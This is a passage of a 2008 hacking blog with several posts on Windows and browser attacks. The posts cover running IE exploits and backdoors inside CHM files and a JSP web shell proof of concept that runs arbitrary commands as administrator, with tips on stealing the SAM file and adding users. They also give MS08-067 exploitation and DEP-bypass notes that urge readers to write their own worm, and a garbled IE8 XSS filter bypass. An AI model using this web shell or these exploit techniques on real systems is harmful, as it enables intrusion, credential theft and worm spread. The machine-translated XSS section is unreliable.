if Flag = 0 then
file.delete
end if
Next

For Execute You can use it:

——————————————————————————————————————————————-

Bypass Script Protection in CHM :

When You Run This Exploit [ Last Of IE 7 Exploit In this Time ] :

http://www.milw0rm.com/exploits/7410

This Exploit Detect By IE Script Security Protection . You Can Run This Exploit in CHM & Don’t Worry For Execution through “Heap Spray” Method .

Test IT :

http://abysssec.com/files/Execute-with-IE.chm

OK , deduction :

1 – We can put Backdoor & Trojan in CHM files [Fake Book ]

2- We Can Run IE Exploit in CHM files .

3- We Can Execute & Download & Upload with chm files .

4- We Can Run All COM & DLL Objeects with it .

In future :

1- talk about Heap Spray Method .

2- Talk About Fuzzing OBJECT .

3- Talk About Bypass Activex Question in .CHM [ If i found It !!!!]

Question ?

———————————————–

abysssec comment problem solved fill free to write your comment and mail your request and questions to us .

DAphne

Tomcat & Jrun Privilege Escalation (Windows)

daphne — Thu, 27 Nov 2008 21:07:10 +0000

In the name of God.

Hello my friend & all readers ,

Tomcat [jsp] & Jrun [ColdFusion] & some HTTP server , when called “JSP” function in windows , Attackers can Privilege Escalation .

This bug Emanate from differ Kernel in windows and Linux .

Example Vulnerable Software : “PLESK” or many of web management systems Used them , you can find them .

TOMCAT : [http://tomcat.apache.org/]

Jrun : [http://www.adobe.com/products/jrun/]

Diagram of Run web Application In windows [ Attention in user mode & kernel Mode ] :

Diagram of Run web Application In Linux [ Attention in user mode & kernel Mode ] :

Please Attention to diragrams , I don’t mean describe win & lin kernel , But you see , in windows services security & Application Security are in user mode & you are not face to face with kernel , But in linux we have a different Calling Services & user access .

when “JSP” web application Run in Linux [ with tomcat or other Server ] , You can use Privilege of owner [runner] user . but , when you run This in windows [TOMCAT or Jrun web server ] , “JSP” Application take jrun or tomcat Access .

They have Administrator Access . Therefor You have Admin level process.

use [getRuntime().exec] Function in [JSP] you can run Process .

This is a test . [Detail]

import java.io.IOException;Runtime.getRuntime().exec("\"c:/program files/windows/notepad.exe\"");

here is one of published PoC For this vulnerabilities

we can run it , [abysssec.jsp] -> :
< %@ page import="java.util.*,java.io.*"%> < % %>


< %--

abysssec inc public material
just upload this file with abysssec.jsp and execute your command

your command will run as administrator . you can download sam file

add user or do anything you want .

note : please be gentle and don't obstructionism .

vulnerability discovered by : abysssec.com
 --%>



 Abysssec inc (abysssec.com) JSP vulnerability<br />
<center><br />
<h3>JSP Privilege Escalation Vulnerability PoC</h3>
<p></center></p>
<form METHOD="GET" NAME="myform" ACTION="">
<input TYPE="text" NAME="cmd"/>
<input TYPE="submit" VALUE="Execute !"/>
</form>
<pre>
< %
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr);
                disr = dis.readLine();
                }
        }
%>
</pre>
<p>

# milw0rm.com [2008-11-28]

another talk about MS08-067

shahin — Wed, 29 Oct 2008 16:10:46 +0000

hi again

i,m sure you know about this ciritical / wormable vulnerability . immediate after releasing vulnerability Win32.Gimmiv worm released too . this worm use this vulnerability and will run after first execute as a windows service . but i,m sure this worm is not last worm based on this vulnerability .

this vulnerability specifically exists on Server Service Remote Procedure Call (RPC) handling, where an attacker could perform a stacked-based buffer overflow by sending a request to a vulnerable function, “NetPathCanonicalize()”. In this way an attacker may escalate privileges, using the named pipe “\\pipe\srvsvc” to access other machines over the network via the pipe’s file sharing service.

exploiting this vulnerability On win 2k and XP SP1 Sp2 and Sp3 is really fun just rpc requset to based on 4b324fc8-1670-01d3-1278-5a47bf6ee188 to getting reliable eip and code executing . in windows xp sp1 and 2k and of course windows xp sp2 and sp3 with no dep you need just a jmp or call esi or edi register for code executing .

and about windows xp sp2 and sp3 with dep :

you can use address of NtSetInformationProcess call in ACGENRAL.DLL for disable DEP of course you need Scratch ( read/write static memory location) and you can find that in ACCGENRAL.dll too .

hd moore independent security researcher used this method for executing shellcode . in windows xp sp3 you can use this method (using pre-process disable in ACCGENRAL.dll ) (of course with differing address of calling NtSetInformationProcess()) .

from hdm :

The actual function we use to disable NX looks like this:

push    4
lea     eax, [ebp+arg_0]
push    eax
push    22h
push    0FFFFFFFFh
mov     [ebp+arg_0], 2
call    ds:__imp__NtSetInformationProcess@16
i wrote my own reliable exploit and maybe in future i public that for all

and about GIMMIV worm :

full discussion :

http://community.ca.com/blogs/securityadvisor/archive/2008/10/27/ms08-067-wormable-vulnerability-patched.aspx

The executable “WinbaseInst.exe” is the worm component you can see worm service after executing binary following this picture :

you can be sure this worm use this vulnerability from founded UUID in basesvc.dll in %SystemRoot%\system32\wbem

after worm scanned and found vulnerable system using 4b324fc8-1670-01d3-1278-5a47bf6ee188 worm run download and execute shellcode following this picture :

this worm use random number and random server for downloading files . i,m sure this worm have different compiled version (for leaked servers and AV’s ) . maybe in another post i discuss about this worm completely.

you can read full post about reversing ms08-067 patch here :

http://www.dontstuffbeansupyournose.com

next post will be patch analysis part 1

for now test your skills for write your own worm with this vulnerability .

best regards and have nice hacking

internet explorer 8 XSS filter bypassing

shahin — Thu, 09 Oct 2008 18:14:35 +0000

IE8 is a new Microsoft browser, the integrity of its CSS2.1 support, HTML5 support,
built-in development tools and so on. IE8 in the browser security on a very big improvement, not a
built-in unloading the Xss Filter, non-durable type of cross-site scripting attacks do a relatively good
protection. However, 80 sec in the test IE8 found, IE8 the Xss Filter there are Vuln, resulting
in some version of the eastern countries simply can not stop the URL Xss for example,
in the Persian version, use some simple data can Bypass Filter out the strategy IE8.

Vulnerability analysis: As IE8 Xss Filter in the filter to take the coding system is built-in encoding,
in the Persian version will be gb2312, in some other Eastern countries will adopt the appropriate wide-byte coding.
Submitted a non-coding sequences such as% c1 and in the pages displayed, because of their pages will be designated a UTF-8 encoding for example, in the analytical
time % c1 Vuln that: assume that there are web script:

header("Content-Type: text/html; charset=utf-8"); echo $_GET[c]; ?>

In the east of the country IE8 system, if the conduct of conventional XSS such as:
.php?c=
IE8 security strategy will be to stop, but if the
The code can bypass the ie8 xss filter and implementation.

vulnerability state: this vulnerability reported to microsoft (by chinese hacker ) and is awaiting a response.